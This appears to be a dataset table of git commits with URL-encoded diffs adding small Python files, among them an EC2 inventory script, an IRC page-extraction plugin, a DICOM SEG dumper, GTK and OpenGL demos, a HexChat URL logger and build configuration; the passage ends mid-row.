commit
stringlengths
40
40
subject
stringlengths
1
3.25k
old_file
stringlengths
4
311
new_file
stringlengths
4
311
old_contents
stringlengths
0
26.3k
lang
stringclasses
3 values
proba
float64
0
1
diff
stringlengths
0
7.82k
51e368584d59ad2f308f1c9229fbbbf40c504749
Create list.py
list.py
list.py
Python
0.000003
@@ -0,0 +1,1009 @@ +import argparse%0Aimport boto.ec2%0A%0Aaccess_key = ''%0Asecret_key = ''%0A%0Adef get_ec2_instances(region):%0A ec2_conn = boto.ec2.connect_to_region(region,%0A aws_access_key_id=access_key,%0A aws_secret_access_key=secret_key)%0A reservations = ec2_conn.get_all_reservations()%0A for reservation in reservations: %0A print region+':',reservation.instances%0A%0A for vol in ec2_conn.get_all_volumes():%0A print region+':',vol.id%0A%0A %0A%0Adef main():%0A regions = %5B'us-east-1','us-west-1','us-west-2','eu-west-1','sa-east-1',%0A 'ap-southeast-1','ap-southeast-2','ap-northeast-1'%5D%0A parser = argparse.ArgumentParser()%0A parser.add_argument('access_key', help='Access Key');%0A parser.add_argument('secret_key', help='Secret Key');%0A args = parser.parse_args()%0A global access_key%0A global secret_key%0A access_key = args.access_key%0A secret_key = args.secret_key%0A %0A for region in regions: get_ec2_instances(region)%0A%0Aif __name__ =='__main__':main()%0A
c0bca49a19e4f97663b9f282bb11768457aec89e
Add example of tycho2 usage
example.py
example.py
Python
0
@@ -0,0 +1,1096 @@ +# -*- coding: utf-8 -*-%0A%22%22%22%0ACreated on Sat Oct 21 00:17:33 2017%0A%0A@author: lauri.kangas%0A%22%22%22%0A%0Aimport matplotlib.pyplot as plt%0Aimport numpy as np%0A%0Afrom tycho2 import tycho2%0Afrom projections import stereographic, unity%0Aimport coordinate_transformations as coord%0A %0Aindex = np.load('tyc2index.npy')%0Acatalog = np.load('tyc2.npy', mmap_mode='r')%0Asuppl = np.load('tyc2sup.npy')%0A%0Acenter_RADEC = np.radians(%5B90, 0%5D)%0Arotation = np.radians(0)%0A%0Afov_degrees = np.array(%5B70, 70%5D)%0Afov_radians = np.radians(fov_degrees)%0Ahalf_fov_radians = fov_radians/2%0A%0Aprojection = stereographic%0Aprojection = unity%0A%0Aimage_plane_half_fov = projection(half_fov_radians)%0A%0ALM = 12%0Afactor = 4%0A%0ATYC2 = tycho2('tyc2index.npy', 'tyc2.npy', 'tyc2sup.npy', projection=projection)%0Aimage_x, image_y, mags = TYC2.stars_in_fov(center_RADEC, fov_radians, rotation, LM=LM)%0A%0Aplt.clf()%0Aplt.scatter(image_x, image_y, (LM-mags)**2.5/LM*factor, alpha=1)%0A%0Aplt.axis('equal')%0A%0Aimport matplotlib.patches as patches%0A%0Aplt.gca().add_patch(patches.Rectangle(-image_plane_half_fov, *(2*image_plane_half_fov), fill=False))%0Aplt.tight_layout()%0Aplt.axis('off')
6dc4d2d1e9ef998ff310c14c54586ca694572801
Add extract plugin
extract.py
extract.py
Python
0.000001
@@ -0,0 +1,979 @@ +%22%22%22This plugin extracts the main content of a webpage%22%22%22%0A%22%22%22e.g. extracting the article of a url of bbc.co.uk%22%22%22%0A%0Afrom utils import add_cmd, add_handler%0Aimport utils%0Aimport requests%0Afrom bs4 import BeautifulSoup%0A%0Aname = %22extract%22%0Acmds = %5B%22extract%22%5D%0A%0Adef main(irc):%0A%09if name not in irc.plugins.keys():%0A%09%09irc.plugins%5Bname%5D = %7B%7D%0A%0A@add_cmd%0Adef extract(irc, event, args):%0A%09try:%0A%09%09html = requests.get(args%5B0%5D).text%0A%09%09soup = BeautifulSoup(html)%0A%09%09for script in soup(%5B%22script%22, %22style%22%5D):%0A%09%09 script.extract()%0A%09%09text = soup.get_text()%0A%09%09lines = (line.strip() for line in text.splitlines())%0A%09%09chunks = (phrase.strip() for line in lines for phrase in line.split(%22 %22))%0A%09%09text = '%5Cn'.join(chunk for chunk in chunks if chunk)%0A%09%09text = text.encode('ascii', 'ignore')%0A%09%09irc.reply(event, (text%5B:350%5D + '..') if len(text) %3E 350 else text)%0A%09except IndexError:%0A%09%09irc.reply(event, utils.gethelp(%22extract%22))%0A%09except:%0A%09%09irc.reply(event, %22Error extracting informations%22)%0A%0A%0Aadd_handler(extract, name)
8c71a177c16762ab50dafe2528d24fab4ccf0925
Add py solution for 462. Minimum Moves to Equal Array Elements II
py/minimum-moves-to-equal-array-elements-ii.py
py/minimum-moves-to-equal-array-elements-ii.py
Python
0.000163
@@ -0,0 +1,236 @@ +class Solution(object):%0A def minMoves2(self, nums):%0A %22%22%22%0A :type nums: List%5Bint%5D%0A :rtype: int%0A %22%22%22%0A nums.sort()%0A median = nums%5Blen(nums) / 2%5D%0A return sum(abs(x - median) for x in nums)%0A
9cd494f526fa49e04bbdbb31dc6d32f444bbbba8
add a tool to print the content of SEG frames
util/dumpSEGPixelData.py
util/dumpSEGPixelData.py
Python
0
@@ -0,0 +1,1653 @@ +import pydicom, sys%0Afrom colorama import Fore, Style, init%0A%0A# colorama%0Ainit()%0A%0Ad = pydicom.read_file(sys.argv%5B1%5D)%0Aif len(sys.argv)%3E2:%0A frame = int(sys.argv%5B2%5D)-1%0A print(%22Dumping frame %22+str(frame))%0Aelse:%0A frame = None%0Aprint(d.Rows)%0Aprint(d.Columns)%0Aprint(d.NumberOfFrames)%0A%0AtotalPixels = int(d.Rows*d.Columns*d.NumberOfFrames/8)%0Aif totalPixels%258:%0A totalPixels = totalPixels + 1%0AtotalPixels = totalPixels + (totalPixels %25 2)%0Aprint(%22Total pixels expected: %25i%22 %25 totalPixels)%0A%0Aprint(%22Total pixels actual: %25i%22 %25 len(d.PixelData))%0A%0Aif not frame is None:%0A frames = %5Bframe%5D%0Aelse:%0A frames = range(d.NumberOfFrames)%0A%0A%0A%0Aimport numpy as np%0Aunpacked = np.unpackbits(np.frombuffer(d.PixelData,dtype=np.uint8))%0A%0Aprint(%22With numpy unpackbits:%22)%0A%0Afor f in frames:%0A print(%22Frame %25i%22 %25 f)%0A for i in range(d.Rows):%0A for j in range(d.Columns):%0A pixelNumber = f*d.Rows*d.Columns+i*d.Columns+j%0A if int(pixelNumber/8)%252:%0A sys.stdout.write(Fore.RED)%0A else:%0A sys.stdout.write(Fore.WHITE)%0A if unpacked%5BpixelNumber%5D:%0A sys.stdout.write(%22X%22)%0A else:%0A sys.stdout.write(%22.%22)%0A print(%22%22)%0A%0Aprint(%22%5CnWith manual unpacking:%22)%0Afor f in frames:%0A print(%22Frame %25i%22 %25 f)%0A for i in range(d.Rows):%0A for j in range(d.Columns):%0A pixelNumber = f*d.Rows*d.Columns+i*d.Columns+j%0A byteNumber = int(pixelNumber/8)%0A bitPosition = pixelNumber %25 8%0A if byteNumber%252:%0A sys.stdout.write(Fore.RED)%0A else:%0A sys.stdout.write(Fore.WHITE)%0A if (d.PixelData%5BbyteNumber%5D %3E%3E bitPosition) & 1:%0A sys.stdout.write(%22X%22)%0A else:%0A sys.stdout.write(%22.%22)%0A print(%22%22)%0Aprint(Style.RESET_ALL)%0A
ec3ef6e8770b9a36f20a05216d8e0964107a8689
Add a new snippet (Python GTK+3).
python/pygtk/python_gtk3_pygobject/combobox.py
python/pygtk/python_gtk3_pygobject/combobox.py
Python
0.000002
@@ -0,0 +1,2840 @@ +#!/usr/bin/env python3%0A# -*- coding: utf-8 -*-%0A%0A# Copyright (c) 2015 J%C3%A9r%C3%A9mie DECOCK (http://www.jdhp.org)%0A%0A%22%22%22%0AThis is the simplest Python GTK+3 snippet.%0A%0ASee: http://python-gtk-3-tutorial.readthedocs.org/en/latest/combobox.html%0A%0A%22For a simple list of textual choices, the model-view API of Gtk.ComboBox can%0Abe a bit overwhelming. In this case, Gtk.ComboBoxText offers a simple%0Aalternative.%22%0A%22%22%22%0A%0Afrom gi.repository import Gtk as gtk%0A%0ACOMBOBOX_TEXT_LIST = %5B%22Hello World!%22, %22Hi!%22, %22Goodbye.%22%5D%0A%0Adef print_text(widget, data):%0A %22%22%22%0A Print the content of the ComboBoxText widget.%0A%0A This is an usage example fo gtk.ComboBoxText.get_active_text().%0A %22%22%22%0A print(data.get_active_text()) # data is a gtk.ComboBoxText widget%0A%0Adef reset_selection(widget, data):%0A %22%22%22%0A Clear the content of the ComboBoxText widget.%0A%0A This is an usage example fo gtk.ComboBoxText.set_active().%0A %22%22%22%0A data.set_active(0) # select the first item ; data is a gtk.ComboBoxText widget%0A%0Adef main():%0A window = gtk.Window()%0A%0A vertical_box = gtk.Box(orientation = gtk.Orientation.VERTICAL, spacing = 6) # 6 pixels are placed between children%0A window.add(vertical_box)%0A%0A # Label and Combobox ##############%0A%0A horizontal_box1 = gtk.Box(orientation = gtk.Orientation.HORIZONTAL, spacing = 6) # 6 pixels are placed between children%0A%0A label = gtk.Label(label=%22Text to print:%22)%0A horizontal_box1.pack_start(label, True, True, 0)%0A%0A combobox = gtk.ComboBoxText()%0A combobox.set_entry_text_column(0) # sets the model column which ComboBox should use to get strings from to be text_column%0A for text in COMBOBOX_TEXT_LIST:%0A combobox.append_text(text) # fill the combobox%0A combobox.set_active(0) # select the first item%0A horizontal_box1.pack_start(combobox, True, True, 0)%0A%0A vertical_box.pack_start(horizontal_box1, True, True, 0)%0A%0A # Buttons #########################%0A%0A horizontal_box2 = gtk.Box(orientation = gtk.Orientation.HORIZONTAL, spacing = 6) # 6 pixels are placed between children%0A%0A # Print button%0A button1 = gtk.Button(label=%22Print%22)%0A button1.connect(%22clicked%22, print_text, combobox) # connect(%22event%22, callback, data)%0A horizontal_box2.pack_start(button1, True, True, 0)%0A%0A # Clean button%0A button2 = gtk.Button(label=%22Reset%22)%0A button2.connect(%22clicked%22, reset_selection, combobox) # connect(%22event%22, callback, data)%0A horizontal_box2.pack_start(button2, True, True, 0)%0A%0A vertical_box.pack_start(horizontal_box2, True, True, 0)%0A%0A ###%0A%0A window.connect(%22delete-event%22, gtk.main_quit) # ask to quit the application when the close button is clicked%0A window.show_all() # display the window%0A gtk.main() # GTK+ main loop%0A%0Aif __name__ == '__main__':%0A main()%0A%0A
5c3589b295c9b9156a6bbfdcecc81754a76f9e0d
Create url-logger.py
url-logger.py
url-logger.py
Python
0.000017
@@ -0,0 +1,2097 @@ +from datetime import datetime%0Aimport hexchat%0Aimport os%0Aimport re%0A%0A__module_name__ = %22URL Logger%22%0A__module_author__ = %22Poorchop%22%0A__module_version__ = %220.1%22%0A__module_description__ = %22Log URLs from specific channels and PMs to disk%22%0A%0A# channels PMs%0Awatched_channels = (%22#hexchat%22, %22TingPing%22)%0A%0Aevents = (%22Channel Message%22, %22Channel Action%22,%0A %22Channel Msg Hilight%22, %22Channel Action Hilight%22,%0A %22Private Message%22, %22Private Message to Dialog%22,%0A %22Private Action%22, %22Private Action to Dialog%22)%0A# regex source: http://blog.mattheworiordan.com/post/13174566389/url-regular-expression-for-links-with-or-without-the%0Aurl_regex = re.compile(%22(((%5BA-Za-z%5D%7B3,9%7D:(?:%5C/%5C/)?)(?:%5B%5C-;:&=%5C+%5C$,%5Cw%5D+@)?%5BA-Za-z0-9%5C.%5C-%5D+%7C(?:www%5C.%7C%5B%5C-;:&=%5C+%5C$,%5Cw%5D+@)%5BA%22%0A %22-Za-z0-9%5C.%5C-%5D+)((?:%5C/%5B%5C+~%25%5C/%5C.%5Cw%5C-_%5D*)?%5C??(?:%5B%5C-%5C+=&;%25@%5C.%5Cw_%5D*)#?(?:%5B%5C.%5C!%5C/%5C%5C%5Cw%5D*))?)%22)%0A%0A%0Adef url_logger(stripped_word, nick, network, chan, time):%0A directory = os.path.join(hexchat.get_info(%22configdir%22), %22logs%22, network, chan)%0A if not os.path.exists(directory):%0A os.makedirs(directory)%0A directory = os.path.join(hexchat.get_info(%22configdir%22), %22logs%22, network, chan, %22urls.txt%22)%0A f = open(directory, %22a%22)%0A f.write(time + %22 %22 + nick + %22@%22 + chan + %22:%22 + network + %22 - %22 + stripped_word + %22%5Cn%22)%0A f.close()%0A%0A%0Adef url_finder(word, nick, network, chan, time):%0A for w in word%5B1%5D.split():%0A stripped_word = hexchat.strip(w, -1, 3)%0A if url_regex.match(stripped_word):%0A url_logger(stripped_word, nick, network, chan, time)%0A%0A%0Adef chan_check_cb(word, word_eol, userdata):%0A word = %5B(word%5Bi%5D if len(word) %3E i else %22%22) for i in range(4)%5D%0A chan = hexchat.get_info(%22channel%22)%0A if chan in watched_channels:%0A nick = hexchat.strip(word%5B0%5D, -1, 3)%0A time = datetime.now().strftime(%22%5B%25b %25d %25Y %25H:%25M%5D%22)%0A network = hexchat.get_info(%22network%22)%0A url_finder(word, nick, network, chan, time)%0A%0A%0Afor event in events:%0A hexchat.hook_print(event, chan_check_cb)%0A%0Ahexchat.prnt(__module_name__ + %22 version %22 + __module_version__ + %22 loaded%22)%0A
2206ec50a5645f3dbcb905f0eae90e9f4b1e5262
Change compare condition
platformio/builder/scripts/ststm32.py
platformio/builder/scripts/ststm32.py
# Copyright (C) Ivan Kravets <me@ikravets.com> # See LICENSE for details. """ Builder for ST STM32 Series ARM microcontrollers. """ import platform from os.path import isfile, join from SCons.Script import (COMMAND_LINE_TARGETS, AlwaysBuild, Default, DefaultEnvironment, Exit, SConscript) env = DefaultEnvironment() SConscript(env.subst(join("$PIOBUILDER_DIR", "scripts", "basearm.py"))) if "gdb" in env['UPLOAD_PROTOCOL']: if not isfile(join(env.subst("$PROJECT_DIR"), "upload.gdb")): Exit( "You are using GDB as firmware uploader. " "Please specify upload commands in upload.gdb " "file in project directory!" ) env.Replace( UPLOADER=join( "$PIOPACKAGES_DIR", "toolchain-gccarmnoneeabi", "bin", "arm-none-eabi-gdb" ), UPLOADERFLAGS=[ join("$BUILD_DIR", "firmware.elf"), "-batch", "-x", join("$PROJECT_DIR", "upload.gdb") ], UPLOADCMD="$UPLOADER $UPLOADERFLAGS" ) else: env.Replace( UPLOADER=join("$PIOPACKAGES_DIR", "tool-stlink", "st-flash"), UPLOADERFLAGS=[ "write", # write in flash "$SOURCES", # firmware path to flash "0x08000000" # flash start adress ], UPLOADCMD="$UPLOADER $UPLOADERFLAGS" ) env.Append( CPPDEFINES=[ "${BOARD_OPTIONS['build']['variant'].upper()}" ], LINKFLAGS=[ "-nostartfiles", "-nostdlib" ] ) # # Target: Build executable and linkable firmware # target_elf = env.BuildFirmware() # # Target: Build the .bin file # if "uploadlazy" in COMMAND_LINE_TARGETS: target_firm = join("$BUILD_DIR", "firmware.bin") else: target_firm = env.ElfToBin(join("$BUILD_DIR", "firmware"), target_elf) # # Target: Print binary size # target_size = env.Alias("size", target_elf, "$SIZEPRINTCMD") AlwaysBuild(target_size) # # Target: Upload by default .bin file # disable_msd = (platform.system() == "Darwin" and platform.release().startswith("14.")) if "mbed" in env.subst("$FRAMEWORK") and not disable_msd: upload = env.Alias(["upload", "uploadlazy"], target_firm, env.UploadToDisk) else: upload = env.Alias(["upload", "uploadlazy"], target_firm, "$UPLOADCMD") AlwaysBuild(upload) # # Target: Define targets # Default([target_firm, target_size])
Python
0.000001
@@ -424,17 +424,8 @@ %0Aif -%22gdb%22 in env%5B @@ -442,16 +442,25 @@ OTOCOL'%5D + == %22gdb%22 :%0A if
3c4c06607eb14920cf4b9d0e4fb6d29f37d1d0ec
Add db_add.py, adding a post from a file, with tags from the filename.
db_add.py
db_add.py
Python
0
@@ -0,0 +1,1485 @@ +#!/usr/bin/env python%0A# -*- coding: iso-8859-1 -*-%0A%0Afrom sys import argv, exit%0Afrom dbclient import dbclient%0Afrom hashlib import md5%0Aimport Image%0Afrom cStringIO import StringIO%0Afrom pyexiv2 import Image as ExivImage%0Afrom os.path import basename%0A%0Aif len(argv) %3C 2:%0A%09print %22Usage:%22, argv%5B0%5D, %22filename %5Bfilename %5B..%5D%5D%22%0A%09exit(1)%0A%0Adef determine_filetype(data):%0A%09if data%5B:3%5D == %22%5Cxff%5Cxd8%5Cxff%22: return %22jpeg%22%0A%09if data%5B:4%5D == %22GIF8%22: return %22gif%22%0A%09if data%5B:4%5D == %22%5Cx89PNG%22: return %22png%22%0A%09if data%5B:2%5D == %22BM%22: return %22bmp%22%0A%09if data%5B:3%5D == %22FWS%22 or data%5B:3%5D == %22CWS%22: return %22swf%22%0A%0Adef imagesize(fh):%0A%09img = Image.open(fh)%0A%09return img.size%0A%0Adef imagetime(fn):%0A%09img = ExivImage(fn)%0A%09img.readMetadata()%0A%09return img%5B'Exif.Image.DateTime'%5D%0A%0Aclient = dbclient()%0Afor fn in argv%5B1:%5D:%0A%09data = file(fn).read()%0A%09m = md5(data).hexdigest()%0A%09ft = determine_filetype(data)%0A%09assert ft%0A%09post = client.get_post(m)%0A%09if not post:%0A%09%09datafh = StringIO(data)%0A%09%09w, h = imagesize(datafh)%0A%09%09args = %7B%22md5%22: m, %22width%22: w, %22height%22: h, %22filetype%22: ft%7D%0A%09%09try:%0A%09%09%09datafh.seek(0)%0A%09%09%09args%5B%22date%22%5D = imagetime(fn)%0A%09%09except Exception:%0A%09%09%09pass%0A%09%09client.add_post(**args)%0A%09full = %5B%5D%0A%09weak = %5B%5D%0A%09post = client.get_post(m)%0A%09posttags = map(lambda t: t%5B1:%5D if t%5B0%5D == %22~%22 else t, post%5B%22tagguid%22%5D)%0A%09for tag in basename(fn).split()%5B:-1%5D:%0A%09%09if tag%5B0%5D == %22~%22:%0A%09%09%09tags = weak%0A%09%09%09tag = tag%5B1:%5D%0A%09%09else:%0A%09%09%09tags = full%0A%09%09t = client.find_tag(tag)%0A%09%09if t and t not in posttags: tags.append(t)%0A%09if full or weak:%0A%09%09client.tag_post(m, full, weak)%0A
7570e757e79c29974afffeee036f056328a06fe9
Create pull.py
pull.py
pull.py
Python
0.000001
@@ -0,0 +1,43 @@ +It's a file to try my first pull derective%0A
5d38ab06fd014241cba7e8cdcfed9887a92460b9
Add smoke tests aperiodic
neurodsp/tests/test_aperiodic_dfa.py
neurodsp/tests/test_aperiodic_dfa.py
Python
0.000013
@@ -0,0 +1,618 @@ +%22%22%22Tests for fractal analysis using fluctuation measures.%22%22%22%0A%0Afrom neurodsp.tests.settings import FS%0A%0Afrom neurodsp.aperiodic.dfa import *%0A%0A###################################################################################################%0A###################################################################################################%0A%0Adef test_compute_fluctuations(tsig):%0A%0A t_scales, flucs, exp = compute_fluctuations(tsig, FS)%0A%0Adef test_compute_rescaled_range(tsig):%0A%0A rs = compute_rescaled_range(tsig, 10)%0A%0Adef test_compute_detrended_fluctuation(tsig):%0A%0A out = compute_detrended_fluctuation(tsig, 10)%0A
3628c21841eea385dbc13e0065ab41138cf102a6
Add users to the admin
djangae/contrib/auth/admin.py
djangae/contrib/auth/admin.py
Python
0
@@ -0,0 +1,105 @@ +from django.contrib import admin%0A%0Afrom djangae.contrib.auth.models import User%0A%0Aadmin.site.register(User)
e506a059369b089cb4c163669a04fbb9d05e9884
add minimal FBO example
examples/minimalframebufferexample.py
examples/minimalframebufferexample.py
Python
0.000001
@@ -0,0 +1,1564 @@ +from scipy.misc import imsave%0A%0Afrom glitter import ShaderProgram, RectangleTexture, Framebuffer, VertexArray%0Afrom glitter.contexts.glut import GlutWindow, main_loop%0A%0Avertex_shader = %22%22%22%0A#version 400 core%0A%0Alayout(location=0) in vec4 in_position;%0A%0Avoid main() %7B%0A gl_Position = in_position;%0A%7D%0A%22%22%22%0A%0Afragment_shader = %22%22%22%0A#version 400 core%0A%0Alayout(location=0) out vec4 out_color;%0Auniform float dimx, dimy;%0A%0Avoid main() %7B%0A out_color = vec4(gl_FragCoord.x / dimx, gl_FragCoord.y / dimy, 1.0, 1.0);%0A%7D%0A%22%22%22%0A%0Aclass MinimalFramebufferExample(object):%0A def __init__(self):%0A self.window = GlutWindow(double=True, multisample=True, shape=(100, 800))%0A self.window.display_callback = self.display%0A%0A self.shader = ShaderProgram(vertex=vertex_shader, fragment=fragment_shader)%0A self.shader.dimy, self.shader.dimx = self.window.shape%0A self.fbo = Framebuffer(RectangleTexture(shape=self.window.shape + (3,)))%0A%0A self.vao = VertexArray(((-1.0, -1.0), (-1.0, 1.0), (1.0, 1.0), (1.0, -1.0)), elements=((0, 1, 2), (0, 2, 3)))%0A%0A def save(self, filename):%0A self.fbo.clear()%0A with self.shader:%0A with self.fbo:%0A self.vao.draw()%0A imsave(filename, self.fbo%5B0%5D.data)%0A%0A def display(self):%0A self.window.clear()%0A with self.shader:%0A self.vao.draw()%0A self.window.swap_buffers()%0A%0A def run(self):%0A main_loop()%0A%0Aif __name__ == %22__main__%22:%0A ie = MinimalFramebufferExample()%0A ie.save(%22test.png%22)%0A ie.run()%0A # TODO why do I get a bus error on exit?%0A%0A
066c48effb2f2c1534e43687d031e01f823f098f
add common mixins
emgapi/viewsets.py
emgapi/viewsets.py
Python
0.000073
@@ -0,0 +1,1375 @@ +# -*- coding: utf-8 -*-%0A%0A# Copyright 2017 EMBL - European Bioinformatics Institute%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22);%0A# you may not use this file except in compliance with the License.%0A# You may obtain a copy of the License at%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A%0Aimport logging%0A%0Afrom rest_framework import viewsets, mixins%0A%0Alogger = logging.getLogger(__name__)%0A%0A%0Aclass ReadOnlyListModelViewSet(mixins.ListModelMixin,%0A viewsets.GenericViewSet):%0A %22%22%22%0A A viewset that provides default %60list()%60 action.%0A %22%22%22%0A pass%0A%0A%0Aclass ReadOnlyRetrieveModelViewSet(mixins.RetrieveModelMixin,%0A viewsets.GenericViewSet):%0A %22%22%22%0A A viewset that provides default %60retrieve()%60 action.%0A %22%22%22%0A pass%0A%0A%0Aclass ReadOnlyModelViewSet(mixins.RetrieveModelMixin,%0A mixins.ListModelMixin,%0A viewsets.GenericViewSet):%0A %22%22%22%0A A viewset that provides default %60list()%60 and %60retrieve()%60 actions.%0A %22%22%22%0A pass%0A
59ccbc17e7e7f4f75b8f95bb1287b676466068db
Create snake1.py
snake1.py
snake1.py
Python
0.000569
@@ -0,0 +1 @@ +%0A
cf496298c839e63a786bc8b4a934df09beef93ac
Add script to better log time
bin/log.py
bin/log.py
Python
0.000001
@@ -0,0 +1,1132 @@ +#!/usr/bin/env python%0A%0Afrom datetime import date, datetime%0Afrom pathlib import Path%0Aimport csv%0Aimport os%0Aimport sys%0A%0Aif len(sys.argv) != 2:%0A print(%22Usage: %7B%7D 'job to be logged'%22.format(sys.argv%5B0%5D))%0A exit(1)%0A%0Alog_dir = %22%7B%7D/time_logs%22.format(Path.home())%0Aif not os.path.isdir(log_dir):%0A os.mkdir(log_dir)%0A%0Acsv_file = %22%7B%7D/%7B%7D_time_log.csv%22.format(log_dir, date.today())%0Acsv_fields = %5B%22job%22, %22start%22, %22end%22, %22duration%22%5D%0Ajob = sys.argv%5B1%5D%0A%0A%0Adef now_string():%0A return datetime.now().isoformat(timespec=%22seconds%22)%0A%0A%0Adef new_row(job):%0A return %7B%22job%22: job, %22start%22: now_string()%7D%0A%0A%0Adef complete_row(row):%0A row%5B%22end%22%5D = now_string()%0A%0A start = datetime.fromisoformat(row%5B%22start%22%5D)%0A end = datetime.fromisoformat(row%5B%22end%22%5D)%0A%0A row%5B%22duration%22%5D = str(end - start)%0A%0A return row%0A%0A%0Aif os.path.isfile(csv_file):%0A with open(csv_file) as fh:%0A rows = list(csv.DictReader(fh))%0A rows%5B-1%5D = complete_row(rows%5B-1%5D)%0A rows.append(new_row(job))%0Aelse:%0A rows = %5Bnew_row(job)%5D%0A%0Awith open(csv_file, %22w%22) as fh:%0A writer = csv.DictWriter(fh, csv_fields)%0A%0A writer.writeheader()%0A writer.writerows(rows)%0A
432ddd2d1885b76704ff6b2d78fe6e83a57ca5a0
remove jedi linter for now, as too unstable
build.py
build.py
#!/usr/bin/env python # # -*- coding: utf-8 -*- # # This file is part of PyBuilder # # Copyright 2011-2014 PyBuilder Team # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import sys sys.path.insert(0, 'src/main/python') # This is only necessary in PyBuilder sources for bootstrap from pybuilder import bootstrap from pybuilder.core import Author, init, use_bldsup, use_plugin bootstrap() use_plugin("pypi:pybuilder_external_plugin_demo") use_plugin("python.core") use_plugin("python.pytddmon") use_plugin("python.distutils") use_plugin("python.install_dependencies") use_plugin("copy_resources") use_plugin("filter_resources") use_plugin("source_distribution") use_plugin("python.coverage") use_plugin("python.unittest") use_plugin("python.integrationtest") use_plugin("python.flake8") use_plugin("python.frosted") use_plugin("python.jedi_linter") if not sys.version_info[0:2] == (3, 2): use_plugin("python.cram") use_plugin("python.pydev") use_plugin("python.pycharm") use_plugin("python.pytddmon") use_bldsup() use_plugin("pdoc") summary = "An extensible, easy to use continuous build tool for Python" description = """PyBuilder is a build automation tool for python. PyBuilder is a software build tool written in pure Python which mainly targets Python applications. It is based on the concept of dependency based programming but also comes along with powerful plugin mechanism that allows the construction of build life cycles similar to those known from other famous build tools like Apache Maven. """ authors = [Author("Alexander Metzner", "alexander.metzner@gmail.com"), Author("Maximilien Riehl", "max@riehl.io"), Author("Michael Gruber", "aelgru@gmail.com"), Author("Udo Juettner", "udo.juettner@gmail.com")] url = "http://pybuilder.github.io" license = "Apache License" version = "0.10.33" default_task = ["analyze", "publish"] @init def initialize(project): project.build_depends_on("fluentmock") project.build_depends_on("mock") project.build_depends_on("mockito-without-hardcoded-distribute-version") project.build_depends_on("pyfix") # required test framework project.build_depends_on("pyassert") project.build_depends_on("wheel") project.build_depends_on("pdoc") project.build_depends_on("pygments") project.set_property("verbose", True) project.set_property("coverage_break_build", False) project.get_property("coverage_exceptions").append("pybuilder.cli") project.get_property("coverage_exceptions").append("pybuilder.plugins.core_plugin") project.set_property('flake8_break_build', True) project.set_property('flake8_include_test_sources', True) project.set_property('flake8_include_scripts', True) project.set_property('flake8_max_line_length', 130) project.set_property('frosted_include_test_sources', True) project.set_property('frosted_include_scripts', True) project.set_property("copy_resources_target", "$dir_dist") project.get_property("copy_resources_glob").append("LICENSE") project.get_property("filter_resources_glob").append("**/pybuilder/__init__.py") project.get_property("source_dist_ignore_patterns").append(".project") project.get_property("source_dist_ignore_patterns").append(".pydevproject") project.get_property("source_dist_ignore_patterns").append(".settings") # enable this to build a bdist on vagrant # project.set_property("distutils_issue8876_workaround_enabled", True) project.get_property("distutils_commands").append("bdist_wheel") project.set_property("distutils_console_scripts", ["pyb_ = pybuilder.cli:main"]) project.set_property("distutils_classifiers", [ 'Programming Language :: Python', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: Implementation :: PyPy', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Development Status :: 4 - Beta', 'Environment :: Console', 'Intended Audience :: Developers', 'License :: OSI Approved :: Apache Software License', 'Topic :: Software Development :: Build Tools', 'Topic :: Software Development :: Quality Assurance', 'Topic :: Software Development :: Testing'])
Python
0
@@ -1341,41 +1341,8 @@ d%22)%0A -use_plugin(%22python.jedi_linter%22)%0A %0A%0Aif
addb7f342e5c2bc0f1df19bd6d00d50be23a52da
Add Year
year.py
year.py
Python
0
@@ -0,0 +1,422 @@ +months=%5B'January','February','March','April','May','June','July','August','September','October','November','December'%5D%0Aendings=%5B'st','nd','rd'%5D+17*%5B'th'%5D+%5B'st','nd','rd'%5D+7*%5B'th'%5D+%5B'st'%5D%0Ayear=raw_input('Year:')%0Amonth=raw_input('Month(1--12):')%0Aday=raw_input('day(1--31):')%0Amonth_number=int(month)%0Aday_number=int(day)%0Amonth_name=months%5Bmonth_number-1%5D%0Aordinal=day+endings%5Bday_number-1%5D%0Aprint month_name+ ''+ordinal+''+year%0A
dac398518bac49c6c51d04166c021323cdba9235
Add unit tests.
fdp-api/python/tests/test_metadata.py
fdp-api/python/tests/test_metadata.py
Python
0
@@ -0,0 +1,1672 @@ +from nose import with_setup%0Afrom nose.tools import assert_equals, assert_in, assert_true, assert_false%0Afrom metadata import FAIRConfigReader, FAIRGraph, FDPath%0Afrom urllib2 import urlparse%0A%0A%0Areader = FAIRConfigReader()%0A%0Adef test_paths():%0A id = 'abc'%0A for resource in %5B'fdp', 'doc'%5D:%0A assert_equals(FDPath(resource), FDPath(resource, id))%0A%0A for resource in %5B'cat', 'dat', 'dist'%5D:%0A assert_equals(FDPath(resource, id), '%25s/%25s' %25 (FDPath(resource), id))%0A%0A%0Adef test_sections():%0A set_a = set(%5B'fdp','catalog/catalog-01','dataset/breedb','distribution/breedb-sqldump','distribution/breedb-sparql'%5D)%0A set_b = set(reader.getSectionHeaders())%0A assert_true(set_a == set_b)%0A%0A%0Adef test_get_items():%0A for section,fields in reader.getMetadata().iteritems():%0A for field in fields:%0A assert_false(isinstance(reader.getItems(section, field), list))%0A%0A%0Adef test_get_triples():%0A for triple in reader.getTriples():%0A assert_true(isinstance(triple, tuple))%0A assert_equals(len(triple), 3)%0A%0A%0Abase_uri = 'http://127.0.0.1:8080'%0Ag = FAIRGraph(base_uri)%0A%0A%0Adef test_base_uri():%0A assert_equals(base_uri, g.baseURI())%0A%0A%0Adef test_doc_uri():%0A assert_equals(urlparse.urljoin(base_uri, 'doc'), g.docURI())%0A%0A%0Adef test_fdp_uri():%0A 